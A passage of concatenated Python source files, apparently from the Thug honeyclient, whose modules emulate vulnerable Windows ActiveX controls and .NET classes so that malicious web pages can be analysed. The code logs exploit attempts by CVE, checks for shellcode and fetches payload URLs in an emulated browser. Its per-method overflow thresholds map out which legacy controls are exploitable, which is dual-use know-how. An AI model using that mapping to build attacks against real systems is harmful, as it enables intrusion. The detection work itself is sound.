        f'[Scripting.FileSystemObject ActiveX] FolderExists("{folder}")'
    )
    return str(folder).lower() in win32_folders
def GetExtensionName(self, path):  # pylint:disable=unused-argument
    """Return the extension of `path` including the leading dot ("" when absent).

    NOTE(review): os.path.splitext keeps the dot (".py") while the real FSO
    method returns it without one ("py") — confirm which is intended here.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] GetExtensionName("{path}")'
    )
    _, ext = os.path.splitext(path)
    return ext if ext else ""
def GetFile(self, filespec):  # pylint:disable=unused-argument
    """Log the request and return a File wrapper for `filespec`."""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] GetFile("{filespec}")'
    )
    return File.File(filespec)
def GetSpecialFolder(self, arg):
    """Resolve a SpecialFolder index (0=Windows, 1=System, 2=Temp) to a path.

    Unknown indexes resolve to the empty string, mirroring the original
    fall-through behavior.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] GetSpecialFolder("{arg}")'
    )
    arg = int(arg)
    env = {
        0: "%windir%",
        1: "%SystemRoot%\\system32",
        2: "%TEMP%",
    }.get(arg)
    folder = WScriptShell.ExpandEnvironmentStrings(self, env) if env else ""
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] Returning {folder} for GetSpecialFolder("{arg}")'
    )
    return folder
def GetTempName(self):  # pylint:disable=unused-argument
    """Return a random 8-character lowercase-alphanumeric temp file name."""
    log.ThugLogging.add_behavior_warn(
        "[Scripting.FileSystemObject ActiveX] GetTempName()"
    )
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(8))
def MoveFile(self, source, destination):  # pylint:disable=unused-argument
    """Rename an emulated text file: rebind the stream and drop the old key.

    Raises KeyError when `source` was never created in this session.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] MoveFile("{source}", "{destination}")'
    )
    log.TextFiles[destination] = log.TextFiles[source]
    del log.TextFiles[source]
def OpenTextFile(self, sFilePathAndName, ForWriting=True, flag=True):
    """Open (or create) an emulated text stream for `sFilePathAndName`.

    Streams are cached on ``log.TextFiles`` so repeated opens share state.
    In local-analysis mode, opening the analyzed file itself preloads its
    content into the stream.
    """
    log.ThugLogging.add_behavior_warn(
        f'[Scripting.FileSystemObject ActiveX] OpenTextFile("{sFilePathAndName}", '
        f'"{ForWriting}" ,'
        f'"{flag}")'
    )
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Scripting.FileSystemObject ActiveX",
        "OpenTextFile",
        data={"filename": sFilePathAndName, "ForWriting": ForWriting, "flag": flag},
        forward=False,
    )
    if getattr(log, "TextFiles", None) is None:
        log.TextFiles = {}
    if sFilePathAndName in log.TextFiles:
        return log.TextFiles[sFilePathAndName]
    stream = TextStream.TextStream()
    stream._filename = sFilePathAndName
    if log.ThugOpts.local and sFilePathAndName in (
        log.ThugLogging.url,
    ):  # pragma: no cover
        with open(sFilePathAndName, encoding="utf-8", mode="r") as fd:
            stream.Write(fd.read())
    log.TextFiles[sFilePathAndName] = stream
    return stream
| 4,975
|
Python
|
.py
| 122
| 35.02459
| 102
| 0.707043
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,019
|
AnswerWorks.py
|
buffer_thug/thug/ActiveX/modules/AnswerWorks.py
|
# Vantage Linguistics AnserWorks ActiveX Controls
# CVE-2007-6387
import logging
log = logging.getLogger("Thug")
def GetHistory(self, arg):
    """Flag CVE-2007-6387: AnswerWorks GetHistory() overflow (>215 chars)."""
    if len(arg) <= 215:
        return
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "AnswerWorks ActiveX",
        "Overflow in GetHistory",
        cve="CVE-2007-6387",
    )
    log.ThugLogging.Shellcode.check_shellcode(arg)
def GetSeedQuery(self, arg):
    """Flag CVE-2007-6387: AnswerWorks GetSeedQuery() overflow (>215 chars)."""
    if len(arg) <= 215:
        return
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "AnswerWorks ActiveX",
        "Overflow in GetSeedQuery",
        cve="CVE-2007-6387",
    )
    log.ThugLogging.Shellcode.check_shellcode(arg)
def SetSeedQuery(self, arg):
    """Flag CVE-2007-6387: AnswerWorks SetSeedQuery() overflow (>215 chars)."""
    if len(arg) <= 215:
        return
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6387")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "AnswerWorks ActiveX",
        "Overflow in SetSeedQuery",
        cve="CVE-2007-6387",
    )
    log.ThugLogging.Shellcode.check_shellcode(arg)
| 1,275
|
Python
|
.py
| 34
| 28.852941
| 87
| 0.631792
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,020
|
MyspaceUploader.py
|
buffer_thug/thug/ActiveX/modules/MyspaceUploader.py
|
# MySpace Uploader Control 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetAction(self, val):
    """Store the Action property; oversized values (>512 chars) are flagged."""
    self.__dict__["Action"] = val
    if len(val) <= 512:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url, "Myspace UPloader ActiveX", "Overflow in Action property"
    )
    log.ThugLogging.Shellcode.check_shellcode(val)
| 376
|
Python
|
.py
| 11
| 28.727273
| 87
| 0.680556
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,021
|
OfficeOCX.py
|
buffer_thug/thug/ActiveX/modules/OfficeOCX.py
|
# Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary
# Program Execution Vulnerability
# BID-33243
import logging
log = logging.getLogger("Thug")
def OpenWebFile(self, _file):
    """Emulate OpenWebFile() (BID-33243): log the exploit and fetch `_file`."""
    log.ThugLogging.add_behavior_warn(
        "[Office OCX ActiveX] OpenWebFile Arbitrary Program Execution Vulnerability"
    )
    log.ThugLogging.add_behavior_warn(f"[Office OCX ActiveX] Fetching from URL {_file}")
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "Office OCX ActiveX",
        "OpenWebFile Arbitrary Program Execution Vulnerability (BID-33243)",
        forward=False,
        data={"url": _file},
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "BID-33243")
    try:
        self._window._navigator.fetch(_file, redirect_type="Office OCX Exploit")
    except Exception:  # pylint:disable=broad-except
        log.ThugLogging.add_behavior_warn("[Office OCX ActiveX] Fetch failed")
| 945
|
Python
|
.py
| 22
| 37.318182
| 88
| 0.716467
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,022
|
AdodbRecordset.py
|
buffer_thug/thug/ActiveX/modules/AdodbRecordset.py
|
import collections
from thug.DOM.JSClass import JSClass
class Fields(JSClass):
    """Minimal emulation of an ADODB Recordset `Fields` collection."""

    def __init__(self, items=None):
        # Insertion order is preserved so lookups stay stable.
        self.items = collections.OrderedDict() if items is None else items

    @property
    def count(self):
        """Number of fields in the collection."""
        return len(self.items)

    def item(self, key):
        """Return the field stored under `key` (name or index), or None.

        BUGFIX: string keys are resolved with a mapping lookup now; the
        previous ``getattr(self.items, key, None)`` inspected the dict
        object's *attributes* (e.g. returning the bound ``keys`` method for
        key="keys") instead of its stored values.
        """
        if isinstance(key, str):
            return self.items.get(key, None)
        try:
            index = int(key)
        except ValueError:  # pragma: no cover
            return None
        if index < 0 or index > self.count - 1:
            return None
        # NOTE(review): assumes self.items is keyed by integer position when
        # numeric lookups are used — confirm against callers.
        return self.items[index]  # pragma: no cover
| 610
|
Python
|
.py
| 18
| 25.777778
| 74
| 0.614726
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,023
|
IMWebControl.py
|
buffer_thug/thug/ActiveX/modules/IMWebControl.py
|
# iMesh<= 7.1.0.x IMWebControl Class
# CVE-2007-6493, CVE-2007-6492
import logging
log = logging.getLogger("Thug")
def ProcessRequestEx(self, arg):
    """Flag CVE-2007-6492: a NULL/empty ProcessRequestEx argument."""
    if arg:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "iMesh IMWebControl ActiveX",
        "NULL value in ProcessRequestEx",
        cve="CVE-2007-6492",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6492")
def SetHandler(self, arg):
    """Flag CVE-2007-6493: the magic SetHandler value 218959117 (0x0D0D0D0D)."""
    if str(arg) != "218959117":
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "iMesh IMWebControl ActiveX",
        "Overflow in SetHandler",
        cve="CVE-2007-6493",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6493")
| 807
|
Python
|
.py
| 22
| 28.409091
| 87
| 0.625483
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,024
|
Folder.py
|
buffer_thug/thug/ActiveX/modules/Folder.py
|
import logging
log = logging.getLogger("Thug")
ATTRIBUTES = {
    "Normal": 0,  # Normal file. No attributes are set.
    "ReadOnly": 1,  # Read-only file. Attribute is read/write.
    "Hidden": 2,  # Hidden file. Attribute is read/write.
    "System": 4,  # System file. Attribute is read/write.
    "Volume": 8,  # Disk drive volume label. Attribute is read-only.
    "Directory": 16,  # Folder or directory. Attribute is read-only.
    "Archive": 32,  # File has changed since last backup. Attribute is read/write.
    "Alias": 1024,  # Link or shortcut. Attribute is read-only.
    "Compressed": 2048,  # Compressed file. Attribute is read-only.
}

# Case-insensitive view of ATTRIBUTES used by Folder.setAttributes: the
# read-only guard there compares case-insensitively, so the assignment
# lookup must do the same.
_ATTRIBUTES_BY_LOWER_NAME = {name.lower(): value for name, value in ATTRIBUTES.items()}


class Folder:
    """Emulated Windows folder object exposed to analyzed scripts."""

    def __init__(self, filespec):
        self.Path = filespec
        self._Attributes = ATTRIBUTES["Directory"]
        log.ThugLogging.add_behavior_warn(
            f"[Folder ActiveX] Path = {self.Path}, Attributes = {self._Attributes}"
        )

    def getAttributes(self):
        """Return the current attribute bitmask."""
        return self._Attributes

    def setAttributes(self, key):
        """Set the attribute value by name; read-only attributes are ignored.

        BUGFIX: the name lookup is now case-insensitive, matching the guard
        above — previously e.g. "hidden" passed the case-insensitive guard
        but raised KeyError on the exact-case ATTRIBUTES lookup.  Unknown
        names still raise KeyError.
        """
        if key.lower() in (
            "volume",
            "directory",
            "alias",
            "compressed",
        ):
            return
        self._Attributes = _ATTRIBUTES_BY_LOWER_NAME[key.lower()]

    Attributes = property(getAttributes, setAttributes)

    @property
    def ShortPath(self):
        """8.3-style path (components longer than 8 chars become XXXXXX~1)."""
        _shortPath = []
        for p in self.Path.split("\\"):
            spfn = p if len(p) <= 8 else f"{p[:6]}~1"
            _shortPath.append(spfn)
        return "\\\\".join(_shortPath)

    @property
    def ShortName(self):
        """8.3-style short name of the last path component."""
        spath = self.Path.split("\\")
        name = spath[-1]
        if len(name) <= 8:
            return name
        return f"{name[:6]}~1"

    @property
    def Drive(self):
        """Drive letter of the path (defaults to C: when none is present)."""
        spath = self.Path.split("\\")
        if spath[0].endswith(":"):
            return spath[0]
        return "C:"

    def Copy(self, destination, overwrite=True):
        """Log a Copy request; emulation only."""
        log.ThugLogging.add_behavior_warn(
            f"[Folder ActiveX] Copy({destination}, {overwrite})"
        )

    def Move(self, destination):
        """Log a Move request; emulation only."""
        log.ThugLogging.add_behavior_warn(f"[Folder ActiveX] Move({destination})")

    def Delete(self, force=False):
        """Log a Delete request; emulation only."""
        log.ThugLogging.add_behavior_warn(f"[Folder ActiveX] Delete({force})")
| 2,252
|
Python
|
.py
| 60
| 29.6
| 83
| 0.599908
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,025
|
XMLDOMParseError.py
|
buffer_thug/thug/ActiveX/modules/XMLDOMParseError.py
|
class XMLDOMParseError:
    """Read-only error-state object exposed to scripts probing MSXML parsers.

    Every field starts out in the "no error" state (zeroes / empty strings)
    and is published through getter-only properties.
    """

    def __init__(self):
        # Numeric error state: code, absolute offset, line, column, reason.
        for numeric in ("_errorCode", "_filepos", "_line", "_linepos", "_reason"):
            setattr(self, numeric, 0)
        # Textual error state: offending source text and document URL.
        self._srcText = ""
        self._url = ""

    @property
    def errorCode(self):  # pylint:disable=unused-variable
        return self._errorCode

    @property
    def filepos(self):  # pylint:disable=unused-variable
        return self._filepos

    @property
    def line(self):  # pylint:disable=unused-variable
        return self._line

    @property
    def linepos(self):  # pylint:disable=unused-variable
        return self._linepos

    @property
    def reason(self):  # pylint:disable=unused-variable
        return self._reason

    @property
    def srcText(self):  # pylint:disable=unused-variable
        return self._srcText

    @property
    def url(self):  # pylint:disable=unused-variable
        return self._url
| 921
|
Python
|
.py
| 30
| 23.733333
| 58
| 0.631222
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,026
|
ShockwaveFlash12.py
|
buffer_thug/thug/ActiveX/modules/ShockwaveFlash12.py
|
import logging
log = logging.getLogger("Thug")
def GetVariable(self, arg):  # pylint:disable=unused-argument
    """Emulate Flash GetVariable(); only the "$version" query is supported.

    Builds a "WIN maj,min,rev,build" string from the configured Shockwave
    Flash version, padding missing components with "0".  Components beyond
    the fourth are ignored: the original manual index loop raised
    IndexError when the version string had more than four dot-separated
    parts.
    """
    if arg in ("$version",):
        version = ["0", "0", "0", "0"]
        parts = log.ThugVulnModules.shockwave_flash.split(".")
        # Bounded enumerate instead of an unchecked manual index.
        for idx, p in enumerate(parts[:4]):
            version[idx] = p
        return f"WIN {','.join(version)}"
    return ""  # pragma: no cover
| 390
|
Python
|
.py
| 11
| 28.090909
| 64
| 0.565684
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,027
|
RtspVaPgCtrl.py
|
buffer_thug/thug/ActiveX/modules/RtspVaPgCtrl.py
|
# RTSP MPEG4 SP Control 1.x
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def SetMP4Prefix(self, val):
    """Property setter for MP4Prefix; flags oversized values as exploit attempts.

    Values longer than 128 characters match the known stack overflow in the
    RTSP MPEG4 SP control, so the event is logged and the payload is scanned
    for shellcode.
    """
    self.__dict__["MP4Prefix"] = val
    if len(val) > 128:
        log.ThugLogging.log_exploit_event(
            self._window.url,
            "RTSP MPEG4 SP Control ActiveX",
            "Overflow in MP4Prefix property",
        )
        log.ThugLogging.Shellcode.check_shellcode(val)
| 412
|
Python
|
.py
| 13
| 25.076923
| 54
| 0.642132
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,028
|
VLC.py
|
buffer_thug/thug/ActiveX/modules/VLC.py
|
# VLC ActiveX Control
# CVE-2007-4619, CVE-2007-6262
import logging
log = logging.getLogger("Thug")
def getVariable(self, arg):
    """Flag oversized getVariable() arguments (CVE-2007-6262 overflow)."""
    # Arguments within the 255-char limit are benign; nothing to report.
    if len(arg) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url, "VLC ActiveX", "getVariable Overflow", cve="CVE-2007-6262"
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
    log.ThugLogging.Shellcode.check_shellcode(arg)
def setVariable(self, arg0, arg1):
    """Flag oversized setVariable() arguments (CVE-2007-6262 overflow)."""
    # Both arguments within the 255-char limit are benign.
    if max(len(arg0), len(arg1)) <= 255:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url, "VLC ActiveX", "setVariable Overflow", cve="CVE-2007-6262"
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
    for payload in (arg0, arg1):
        log.ThugLogging.Shellcode.check_shellcode(payload)
def addTarget(self, arg0, arg1, arg2, arg3):
    """Flag oversized addTarget() arguments (CVE-2007-6262 overflow)."""
    payloads = (arg0, arg1, arg2, arg3)
    # All arguments within the 255-char limit are benign.
    if all(len(p) <= 255 for p in payloads):
        return
    log.ThugLogging.log_exploit_event(
        self._window.url, "VLC ActiveX", "addTarget Overflow", cve="CVE-2007-6262"
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-6262")
    for p in payloads:
        log.ThugLogging.Shellcode.check_shellcode(p)
| 1,445
|
Python
|
.py
| 29
| 42.37931
| 88
| 0.684698
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,029
|
RealPlayer.py
|
buffer_thug/thug/ActiveX/modules/RealPlayer.py
|
# RealMedia RealPlayer Ierpplug.DLL ActiveX Control
# CVE-2007-5601
import logging
log = logging.getLogger("Thug")
def DoAutoUpdateRequest(self, arg0, arg1, arg2):  # pylint:disable=unused-argument
    """Flag oversized DoAutoUpdateRequest() arguments (CVE-2007-5601 overflow)."""
    # Both arguments below 32 chars are benign.
    if len(arg0) < 32 and len(arg1) < 32:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "RealMedia RealPlayer Ierpplug.DLL ActiveX",
        "Overflow in DoAutoUpdateRequest",
        cve="CVE-2007-5601",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
    for payload in (arg0, arg1):
        log.ThugLogging.Shellcode.check_shellcode(payload)
def PlayerProperty(self, arg):  # pylint:disable=unused-argument
    """Emulate PlayerProperty(); oversized queries are logged (CVE-2007-5601).

    Only "PRODUCTVERSION" yields a real value; everything else returns an
    empty string, after reporting arguments longer than 1000 characters as
    overflow attempts.
    """
    if arg == "PRODUCTVERSION":
        return "6.0.14.552"
    if len(arg) <= 1000:
        return ""  # pragma: no cover
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "RealMedia RealPlayer Ierpplug.DLL ActiveX",
        "Overflow in PlayerProperty",
        cve="CVE-2007-5601",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
    log.ThugLogging.Shellcode.check_shellcode(arg)
    return ""
def Import(self, arg):
    """Flag oversized Import() arguments (CVE-2007-5601 overflow)."""
    # Arguments up to 0x8000 chars are benign; nothing to report.
    if len(arg) <= 0x8000:
        return
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "RealMedia RealPlayer Ierpplug.DLL ActiveX",
        "Overflow in Import",
        cve="CVE-2007-5601",
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
    log.ThugLogging.Shellcode.check_shellcode(arg)
def SetConsole(self, val):
    """Property setter for Console; values of 32+ chars match the rmoc3260 overflow."""
    self.__dict__["Console"] = val
    if len(val) >= 32:
        log.ThugLogging.log_exploit_event(
            self._window.url,
            "RealMedia RealPlayer rmoc3260.DLL ActiveX",
            "Overflow in Console property",
            cve="CVE-2007-5601",
        )
        log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5601")
        log.ThugLogging.Shellcode.check_shellcode(val)
| 2,063
|
Python
|
.py
| 49
| 33.326531
| 87
| 0.643966
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,030
|
JetAudioDownloadFromMusicStore.py
|
buffer_thug/thug/ActiveX/modules/JetAudioDownloadFromMusicStore.py
|
# jetAudio "DownloadFromMusicStore()" Arbitrary File Download Vulnerability
# CVE-2007-4983
import logging
log = logging.getLogger("Thug")
def DownloadFromMusicStore(
    self, url, dst, title, artist, album, genere, size, param1, param2
):  # pylint:disable=unused-argument
    """Emulate the jetAudio arbitrary-file-download call (CVE-2007-4983).

    Logs the requested download (remote URL and local destination), records
    the exploit event, and fetches the URL through the emulated navigator so
    the sample can be captured.  All metadata arguments beyond url/dst are
    ignored.
    """
    log.ThugLogging.add_behavior_warn(
        f"[JetAudio ActiveX] Downloading from URL {url} (saving locally as {dst})"
    )
    log.ThugLogging.log_exploit_event(
        self._window.url,
        "JetAudio ActiveX",
        "Downloading from URL",
        cve="CVE-2007-4983",
        data={"url": url, "file": dst},
        forward=False,
    )
    log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-4983")
    # Best-effort fetch: network errors are logged, never propagated.
    try:
        self._window._navigator.fetch(url, redirect_type="JetAudio exploit")
    except Exception:  # pylint:disable=broad-except
        log.ThugLogging.add_behavior_warn("[JetAudio ActiveX] Fetch failed")
| 932
|
Python
|
.py
| 23
| 34.73913
| 83
| 0.693245
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,031
|
WScriptExec.py
|
buffer_thug/thug/ActiveX/modules/WScriptExec.py
|
import logging
import random
from thug.ActiveX.modules.TextStream import TextStream
log = logging.getLogger("Thug")
class WScriptExec:
    """Emulation of the object returned by WScript.Shell.Exec().

    Exposes fake process state (ExitCode, ProcessID, Status) plus
    TextStream stand-ins for the three standard streams; every property
    access and Terminate() call is logged as behavior.
    """

    def __init__(self):
        self._StdIn = TextStream()
        self._StdOut = TextStream()
        self._StdErr = TextStream()

    @property
    def ExitCode(self):
        """Always reports a successful (0) exit code."""
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting ExitCode")
        return 0

    @property
    def ProcessID(self):
        """Returns a random, plausible-looking process id."""
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting ProcessID")
        return random.randint(100, 65535)

    @property
    def Status(self):
        """Always reports status 1."""
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting Status")
        return 1

    @property
    def StdIn(self):
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdIn")
        return self._StdIn

    @property
    def StdOut(self):
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdOut")
        return self._StdOut

    @property
    def StdErr(self):
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Requesting StdErr")
        return self._StdErr

    def Terminate(self):
        """No-op terminate; only logged."""
        log.ThugLogging.add_behavior_warn("[WScript.Exec ActiveX] Terminate")
| 1,279
|
Python
|
.py
| 35
| 29.971429
| 88
| 0.69262
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,032
|
NCTAudioFile2.py
|
buffer_thug/thug/ActiveX/modules/NCTAudioFile2.py
|
# NCTsoft Products NCTAudioFile2 ActiveX Control
# CVE-2007-0018
import logging
log = logging.getLogger("Thug")
def SetFormatLikeSample(self, arg):
if len(arg) > 4000:
log.ThugLogging.log_exploit_event(
self._window.url,
"NCTAudioFile2 ActiveX",
"Overflow in SetFormatLikeSample",
cve="CVE-2007-0018",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-0018")
log.ThugLogging.Shellcode.check_shellcode(arg)
| 520
|
Python
|
.py
| 14
| 29.785714
| 87
| 0.672655
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,033
|
UniversalUpload.py
|
buffer_thug/thug/ActiveX/modules/UniversalUpload.py
|
# Universal HTTP File Upload (UUploaderSverD.dll - v6.0.0.35)
# CVE-NOMATCH
import logging
log = logging.getLogger("Thug")
def RemoveFileOrDir(self, arg0, arg1): # pylint:disable=unused-argument
log.ThugLogging.add_behavior_warn(
f"[Universal HTTP File Upload ActiveX] Deleting {arg0}"
)
log.ThugLogging.log_exploit_event(
self._window.url,
"Universal HTTP File Upload ActiveX",
"Deleting",
data={"filename": arg0},
forward=False,
)
| 502
|
Python
|
.py
| 15
| 27.933333
| 72
| 0.681159
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,034
|
SonicWallNetExtenderAddRouteEntry.py
|
buffer_thug/thug/ActiveX/modules/SonicWallNetExtenderAddRouteEntry.py
|
# SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX control
# CVE-2007-5603 (AddRouteEntry)
import logging
log = logging.getLogger("Thug")
def AddRouteEntry(self, arg0, arg1):
if len(arg0) > 20 or len(arg1) > 20:
log.ThugLogging.log_exploit_event(
self._window.url,
"SonicWall SSL-VPN NetExtender NELaunchCtrl ActiveX",
"Overflow in AddRouteEntry",
cve="CVE-2007-5603",
)
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2007-5603")
log.ThugLogging.Shellcode.check_shellcode(arg0)
log.ThugLogging.Shellcode.check_shellcode(arg1)
| 646
|
Python
|
.py
| 15
| 35.6
| 87
| 0.686901
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,035
|
__init__.py
|
buffer_thug/thug/ActiveX/modules/System/__init__.py
|
__all__ = ["Collections", "IO", "Runtime", "Security", "Text"]
from . import Collections
from . import IO
from . import Runtime
from . import Security
from . import Text
| 171
|
Python
|
.py
| 6
| 27.333333
| 62
| 0.713415
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,036
|
MemoryStream.py
|
buffer_thug/thug/ActiveX/modules/System/IO/MemoryStream.py
|
import io
import logging
log = logging.getLogger("Thug")
def Write(self, buffer, offset=0, count=-1):
    """Insert `buffer` (str) into the underlying stream at `offset`.

    `count` limits how many characters of `buffer` are written; -1 (the
    default) means the whole buffer.  Position is left at the end of the
    resulting stream.

    Fixes two defects in the original: the slice `buffer[:buflen - 1]`
    silently dropped the final character, and interpolating the raw
    `BytesIO.getvalue()` bytes into an f-string embedded "b'...'" reprs
    into the stream text instead of the actual content.
    """
    log.ThugLogging.add_behavior_warn("[System.IO.MemoryStream] Write")
    buflen = count if count > -1 else len(buffer)
    bufdat = buffer[:buflen]
    # Decode so the pieces concatenate as text, not as bytes reprs.
    # NOTE(review): assumes stream content is UTF-8 text — confirm callers.
    streamdata = self.stream.getvalue().decode("utf-8", "replace")
    data = f"{streamdata[:offset]}{bufdat}{streamdata[offset:]}"
    self.stream = io.BytesIO(data.encode())
    self.Position = len(data)
| 443
|
Python
|
.py
| 11
| 36.181818
| 71
| 0.701878
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,037
|
ASCIIEncoding.py
|
buffer_thug/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
|
import logging
log = logging.getLogger("Thug")
def GetByteCount_2(self, chars):
    """Return the byte length of `chars` when encoded.

    NOTE(review): measures the UTF-8 length despite the ASCIIEncoding name,
    matching the original implementation.
    """
    count = len(bytes(chars, "utf-8"))
    log.ThugLogging.add_behavior_warn(
        f"[System.Text.ASCIIEncoding] GetByteCount_2 count = {count}"
    )
    return count
def GetBytes_4(self, chars):
    """Return `chars` as a list of single-character strings."""
    log.ThugLogging.add_behavior_warn("[System.Text.ASCIIEncoding] GetBytes_4")
    return [*chars]
| 388
|
Python
|
.py
| 11
| 30.909091
| 79
| 0.72043
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,038
|
Activator.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Activator.py
|
class Activator:
    """Minimal stand-in for System.Activator, bound to a delegate."""

    def __init__(self, delegate):
        # Keep the delegate around for inspection by callers.
        self.delegate = delegate

    def CreateInstance(self, Type):
        """No-op: instance creation is not emulated (returns None)."""
        return None
| 134
|
Python
|
.py
| 5
| 20.8
| 35
| 0.640625
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,039
|
Delegate.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Delegate.py
|
from .Activator import Activator
class Delegate:
    """Wraps raw serialized code; DynamicInvoke yields an Activator for it."""

    def __init__(self, code):
        self.code = code

    def DynamicInvoke(self, args):
        # `args` is accepted for signature compatibility but never used.
        return Activator(self)
| 173
|
Python
|
.py
| 6
| 23.333333
| 34
| 0.676829
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,040
|
BinaryFormatter.py
|
buffer_thug/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
|
import logging
from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
log = logging.getLogger("Thug")
def Deserialize_2(self, buf):
    """Emulate BinaryFormatter.Deserialize: wrap raw stream bytes in a Delegate.

    `buf` is expected to expose a `stream` attribute supporting getvalue()
    (e.g. the MemoryStream emulation).  No actual deserialization happens;
    the raw payload is simply captured.
    """
    log.ThugLogging.add_behavior_warn(
        "[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2"
    )
    data = buf.stream.getvalue()
    return Delegate(data)
| 341
|
Python
|
.py
| 9
| 33.666667
| 88
| 0.770642
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,041
|
ArrayList.py
|
buffer_thug/thug/ActiveX/modules/System/Collections/ArrayList.py
|
